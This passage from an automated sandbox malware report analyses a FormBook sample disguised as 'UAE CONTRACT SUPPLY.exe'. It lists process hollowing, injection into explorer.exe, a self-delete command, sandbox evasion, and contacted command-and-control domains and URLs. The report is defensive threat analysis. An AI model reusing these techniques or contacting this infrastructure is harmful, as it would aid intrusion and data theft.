      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_057369A6 mov eax, dword ptr fs:[00000030h]16_2_057369A6
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056EA185 mov eax, dword ptr fs:[00000030h]16_2_056EA185
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056DC182 mov eax, dword ptr fs:[00000030h]16_2_056DC182
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E2990 mov eax, dword ptr fs:[00000030h]16_2_056E2990
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05772073 mov eax, dword ptr fs:[00000030h]16_2_05772073
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05781074 mov eax, dword ptr fs:[00000030h]16_2_05781074
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056D0050 mov eax, dword ptr fs:[00000030h]16_2_056D0050
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056D0050 mov eax, dword ptr fs:[00000030h]16_2_056D0050
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E002D mov eax, dword ptr fs:[00000030h]16_2_056E002D
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E002D mov eax, dword ptr fs:[00000030h]16_2_056E002D
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E002D mov eax, dword ptr fs:[00000030h]16_2_056E002D
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E002D mov eax, dword ptr fs:[00000030h]16_2_056E002D
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E002D mov eax, dword ptr fs:[00000030h]16_2_056E002D
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056CB02A mov eax, dword ptr fs:[00000030h]16_2_056CB02A
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056CB02A mov eax, dword ptr fs:[00000030h]16_2_056CB02A
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056CB02A mov eax, dword ptr fs:[00000030h]16_2_056CB02A
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056CB02A mov eax, dword ptr fs:[00000030h]16_2_056CB02A
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056DA830 mov eax, dword ptr fs:[00000030h]16_2_056DA830
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056DA830 mov eax, dword ptr fs:[00000030h]16_2_056DA830
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056DA830 mov eax, dword ptr fs:[00000030h]16_2_056DA830
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056DA830 mov eax, dword ptr fs:[00000030h]16_2_056DA830
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05737016 mov eax, dword ptr fs:[00000030h]16_2_05737016
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05737016 mov eax, dword ptr fs:[00000030h]16_2_05737016
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05737016 mov eax, dword ptr fs:[00000030h]16_2_05737016
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05784015 mov eax, dword ptr fs:[00000030h]16_2_05784015
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05784015 mov eax, dword ptr fs:[00000030h]16_2_05784015
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056B58EC mov eax, dword ptr fs:[00000030h]16_2_056B58EC
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056B40E1 mov eax, dword ptr fs:[00000030h]16_2_056B40E1
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056B40E1 mov eax, dword ptr fs:[00000030h]16_2_056B40E1
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056B40E1 mov eax, dword ptr fs:[00000030h]16_2_056B40E1
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0574B8D0 mov eax, dword ptr fs:[00000030h]16_2_0574B8D0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0574B8D0 mov ecx, dword ptr fs:[00000030h]16_2_0574B8D0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0574B8D0 mov eax, dword ptr fs:[00000030h]16_2_0574B8D0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0574B8D0 mov eax, dword ptr fs:[00000030h]16_2_0574B8D0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0574B8D0 mov eax, dword ptr fs:[00000030h]16_2_0574B8D0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0574B8D0 mov eax, dword ptr fs:[00000030h]16_2_0574B8D0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F90AF mov eax, dword ptr fs:[00000030h]16_2_056F90AF
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E20A0 mov eax, dword ptr fs:[00000030h]16_2_056E20A0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E20A0 mov eax, dword ptr fs:[00000030h]16_2_056E20A0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E20A0 mov eax, dword ptr fs:[00000030h]16_2_056E20A0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E20A0 mov eax, dword ptr fs:[00000030h]16_2_056E20A0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E20A0 mov eax, dword ptr fs:[00000030h]16_2_056E20A0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E20A0 mov eax, dword ptr fs:[00000030h]16_2_056E20A0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056EF0BF mov ecx, dword ptr fs:[00000030h]16_2_056EF0BF
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056EF0BF mov eax, dword ptr fs:[00000030h]16_2_056EF0BF
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056EF0BF mov eax, dword ptr fs:[00000030h]16_2_056EF0BF
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056B9080 mov eax, dword ptr fs:[00000030h]16_2_056B9080
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05733884 mov eax, dword ptr fs:[00000030h]16_2_05733884
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05733884 mov eax, dword ptr fs:[00000030h]16_2_05733884
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056BDB60 mov ecx, dword ptr fs:[00000030h]16_2_056BDB60
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E3B7A mov eax, dword ptr fs:[00000030h]16_2_056E3B7A
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E3B7A mov eax, dword ptr fs:[00000030h]16_2_056E3B7A
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      System process connects to network (likely due to code injection or exploit)Show sources
      Source: C:\Windows\explorer.exeNetwork Connect: 185.230.60.102 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 104.21.32.11 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
      Maps a DLL or memory area into another processShow sources
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Modifies the context of a thread in another process (thread injection)Show sources
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeThread register set: target process: 3440Jump to behavior
      Source: C:\Windows\SysWOW64\chkdsk.exeThread register set: target process: 3440Jump to behavior
      Queues an APC in another process (thread injection)Show sources
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
      Sample uses process hollowing techniqueShow sources
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeSection unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: 1340000Jump to behavior
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeProcess created: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe 'C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe' Jump to behavior
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe'Jump to behavior
      Source: explorer.exe, 0000000D.00000000.479118102.0000000000EE0000.00000002.00000001.sdmp, chkdsk.exe, 00000010.00000002.634131139.0000000007AB0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 0000000D.00000000.479118102.0000000000EE0000.00000002.00000001.sdmp, chkdsk.exe, 00000010.00000002.634131139.0000000007AB0000.00000002.00000001.sdmpBinary or memory string: Progman
      Source: explorer.exe, 0000000D.00000000.479118102.0000000000EE0000.00000002.00000001.sdmp, chkdsk.exe, 00000010.00000002.634131139.0000000007AB0000.00000002.00000001.sdmpBinary or memory string: &Program Manager
      Source: explorer.exe, 0000000D.00000000.479118102.0000000000EE0000.00000002.00000001.sdmp, chkdsk.exe, 00000010.00000002.634131139.0000000007AB0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_02264A17 cpuid 1_2_02264A17

      Stealing of Sensitive Information:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000010.00000002.631455625.0000000000F70000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.514645997.0000000000080000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.519570188.000000001E270000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000002.631815721.00000000011C0000.00000004.00000001.sdmp, type: MEMORY
      Yara detected Generic DropperShow sources
      Source: Yara matchFile source: Process Memory Space: chkdsk.exe PID: 392, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: UAE CONTRACT SUPPLY.exe PID: 6952, type: MEMORY

      Remote Access Functionality:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000010.00000002.631455625.0000000000F70000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.514645997.0000000000080000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.519570188.000000001E270000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000002.631815721.00000000011C0000.00000004.00000001.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsShared Modules1Path InterceptionProcess Injection512Virtualization/Sandbox Evasion21OS Credential DumpingSecurity Software Discovery721Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection512LSASS MemoryVirtualization/Sandbox Evasion21Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol4SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsSystem Information Discovery311SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 358403 Sample: UAE CONTRACT SUPPLY.exe Startdate: 25/02/2021 Architecture: WINDOWS Score: 100 31 www.sixteen3handscottages.com 2->31 33 www.joybirder.com 2->33 35 2 other IPs or domains 2->35 47 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 Multi AV Scanner detection for submitted file 2->51 53 9 other signatures 2->53 11 UAE CONTRACT SUPPLY.exe 1 2->11         started        signatures3 process4 signatures5 63 Tries to detect Any.run 11->63 65 Hides threads from debuggers 11->65 14 UAE CONTRACT SUPPLY.exe 6 11->14         started        process6 dnsIp7 43 googlehosted.l.googleusercontent.com 142.250.184.65, 443, 49731 GOOGLEUS United States 14->43 45 doc-08-78-docs.googleusercontent.com 14->45 67 Modifies the context of a thread in another process (thread injection) 14->67 69 Tries to detect Any.run 14->69 71 Maps a DLL or memory area into another process 14->71 73 3 other signatures 14->73 18 explorer.exe 14->18 injected signatures8 process9 dnsIp10 37 td-balancer-dc11-60-102.wixdns.net 185.230.60.102, 49749, 80 WIX_COMIL Israel 18->37 39 allsalesvinyl.net 34.102.136.180, 49751, 49752, 49756 GOOGLEUS United States 18->39 41 10 other IPs or domains 18->41 55 System process connects to network (likely due to code injection or exploit) 18->55 22 chkdsk.exe 18->22         started        25 autoconv.exe 18->25         started        signatures11 process12 signatures13 57 Modifies the context of a thread in another process (thread injection) 22->57 59 Maps a DLL or memory area into another process 22->59 61 Tries to detect virtualization through RDTSC time measurements 22->61 27 cmd.exe 1 22->27         started        process14 process15 29 conhost.exe 27->29         started       

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      UAE CONTRACT SUPPLY.exe34%VirustotalBrowse
      UAE CONTRACT SUPPLY.exe37%ReversingLabsWin32.Trojan.Vebzenpak

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      16.2.chkdsk.exe.5bc7960.5.unpack100%AviraTR/Dropper.GenDownload File
      16.2.chkdsk.exe.fd4f08.1.unpack100%AviraTR/Dropper.GenDownload File

      Domains

      SourceDetectionScannerLabelLink
      td-balancer-dc11-60-102.wixdns.net0%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      http://www.allsalesvinyl.net/w25t/?7nf0kP=x6qnXySIKpUJn5XerhvX+0EMzo20pmQQj9ePwr3K6ImaWCKGjDlnwZkCLhxG6Ruvc228xc+5mw==&wj=hBZ8sVLxwZopBdRp0%Avira URL Cloudsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.pardsoda.com/w25t/?wj=hBZ8sVLxwZopBdRp&7nf0kP=15PPGsvA0OesMgSYtNkzWMXd9CXxAPrih7Pi9b51HvfmowsB4G7YJFhsDDlnN8h0byCLDSw3/g==0%Avira URL Cloudsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://www.founder.com.cn/cn0%URL Reputationsafe
      http://www.founder.com.cn/cn0%URL Reputationsafe
      http://www.founder.com.cn/cn0%URL Reputationsafe
      http://www.parentseducationalco-op.com/w25t/?7nf0kP=Uq0CzCwvS6YoWMp/UCKN7JIAByS11Z6E5aUOsXAJZj+0yJL9Nk5m9Qz8CvCcNaQrIL6Vs/Uw3Q==&wj=hBZ8sVLxwZopBdRp0%Avira URL Cloudsafe
      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.aserchofalltrades.com/w25t/?7nf0kP=UE8df8CjPA42HhSGpHRvEFW0E1qwQi3qh9I+J2DwYVAPWlwUU9Jt0Xern2mXQMt791bHr0Uusg==&wj=hBZ8sVLxwZopBdRp0%Avira URL Cloudsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe
      http://www.sixteen3handscottages.com/w25t/?wj=hBZ8sVLxwZopBdRp&7nf0kP=SQSlpqwSeyxeA2HWARjbLzFChTkDZ06wC9CS935ywhThxAQMIzjb51bRjEk1pH3EnhYaWQ8xDg==0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      sixteen3handscottages.com
      		34.102.136.180
      		truetrue
        		unknown
        td-balancer-dc11-60-102.wixdns.net
        		185.230.60.102
        		truetrueunknown
        parentseducationalco-op.com
        		34.102.136.180
        		truetrue
          		unknown
          www.pardsoda.com
          		104.21.32.11
          		truetrue
            		unknown
            googlehosted.l.googleusercontent.com
            		142.250.184.65
            		truefalse
              		high
              allsalesvinyl.net
              		34.102.136.180
              		truetrue
                		unknown
                www.blackholidayco.com
                		unknown
                		unknowntrue
                  		unknown
                  www.joybirder.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.allsalesvinyl.net
                    		unknown
                    		unknowntrue
                      		unknown
                      www.sixteen3handscottages.com
                      		unknown
                      		unknowntrue
                        		unknown
                        www.aserchofalltrades.com
                        		unknown
                        		unknowntrue
                          		unknown
                          www.asesorgrupovivir.com
                          		unknown
                          		unknowntrue
                            		unknown
                            doc-08-78-docs.googleusercontent.com
                            		unknown
                            		unknownfalse
                              		high
                              www.parentseducationalco-op.com
                              		unknown
                              		unknowntrue
                                		unknown
                                cdn.onenote.net
                                		unknown
                                		unknowntrue
                                  		unknown

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  http://www.allsalesvinyl.net/w25t/?7nf0kP=x6qnXySIKpUJn5XerhvX+0EMzo20pmQQj9ePwr3K6ImaWCKGjDlnwZkCLhxG6Ruvc228xc+5mw==&wj=hBZ8sVLxwZopBdRptrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.pardsoda.com/w25t/?wj=hBZ8sVLxwZopBdRp&7nf0kP=15PPGsvA0OesMgSYtNkzWMXd9CXxAPrih7Pi9b51HvfmowsB4G7YJFhsDDlnN8h0byCLDSw3/g==true
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.parentseducationalco-op.com/w25t/?7nf0kP=Uq0CzCwvS6YoWMp/UCKN7JIAByS11Z6E5aUOsXAJZj+0yJL9Nk5m9Qz8CvCcNaQrIL6Vs/Uw3Q==&wj=hBZ8sVLxwZopBdRptrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.aserchofalltrades.com/w25t/?7nf0kP=UE8df8CjPA42HhSGpHRvEFW0E1qwQi3qh9I+J2DwYVAPWlwUU9Jt0Xern2mXQMt791bHr0Uusg==&wj=hBZ8sVLxwZopBdRptrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.sixteen3handscottages.com/w25t/?wj=hBZ8sVLxwZopBdRp&7nf0kP=SQSlpqwSeyxeA2HWARjbLzFChTkDZ06wC9CS935ywhThxAQMIzjb51bRjEk1pH3EnhYaWQ8xDg==true
                                  • Avira URL Cloud: safe
                                  		unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://www.autoitscript.com/autoit3/Jexplorer.exe, 0000000D.00000002.631792237.000000000095C000.00000004.00000020.sdmpfalse
                                    		high
                                    http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.fontbureau.comexplorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpfalse
                                        		high
                                        http://www.fontbureau.com/designersGexplorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpfalse
                                          		high
                                          http://www.fontbureau.com/designers/?explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpfalse
                                            		high
                                            http://www.founder.com.cn/cn/bTheexplorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designers?explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpfalse
                                              		high
                                              http://www.tiro.comexplorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.com/designersexplorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpfalse
                                                		high
                                                http://www.goodfont.co.krexplorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.carterandcone.comlexplorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.sajatypeworks.comexplorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.typography.netDexplorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpfalse
                                                  		high
                                                  http://www.founder.com.cn/cn/cTheexplorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://fontfabrik.comexplorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.founder.com.cn/cnexplorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpfalse
                                                    		high
                                                    http://www.jiyu-kobo.co.jp/explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.galapagosdesign.com/DPleaseexplorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.fontbureau.com/designers8explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpfalse
                                                      		high
                                                      http://www.fonts.comexplorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpfalse
                                                        		high
                                                        http://www.sandoll.co.krexplorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.urwpp.deDPleaseexplorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.zhongyicts.com.cnexplorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.sakkal.comexplorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown

                                                        Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        142.250.184.65
                                                        		unknownUnited States
                                                        		15169GOOGLEUSfalse
                                                        185.230.60.102
                                                        		unknownIsrael
                                                        		58182WIX_COMILtrue
                                                        104.21.32.11
                                                        		unknownUnited States
                                                        		13335CLOUDFLARENETUStrue
                                                        34.102.136.180
                                                        		unknownUnited States
                                                        		15169GOOGLEUStrue

                                                        General Information

                                                        Joe Sandbox Version:31.0.0 Emerald
                                                        Analysis ID:358403
                                                        Start date:25.02.2021
                                                        Start time:15:25:36
                                                        Joe Sandbox Product:CloudBasic
                                                        Overall analysis duration:0h 9m 19s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Sample file name:UAE CONTRACT SUPPLY.exe
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                        Number of analysed new started processes analysed:23
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:1
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • HDC enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
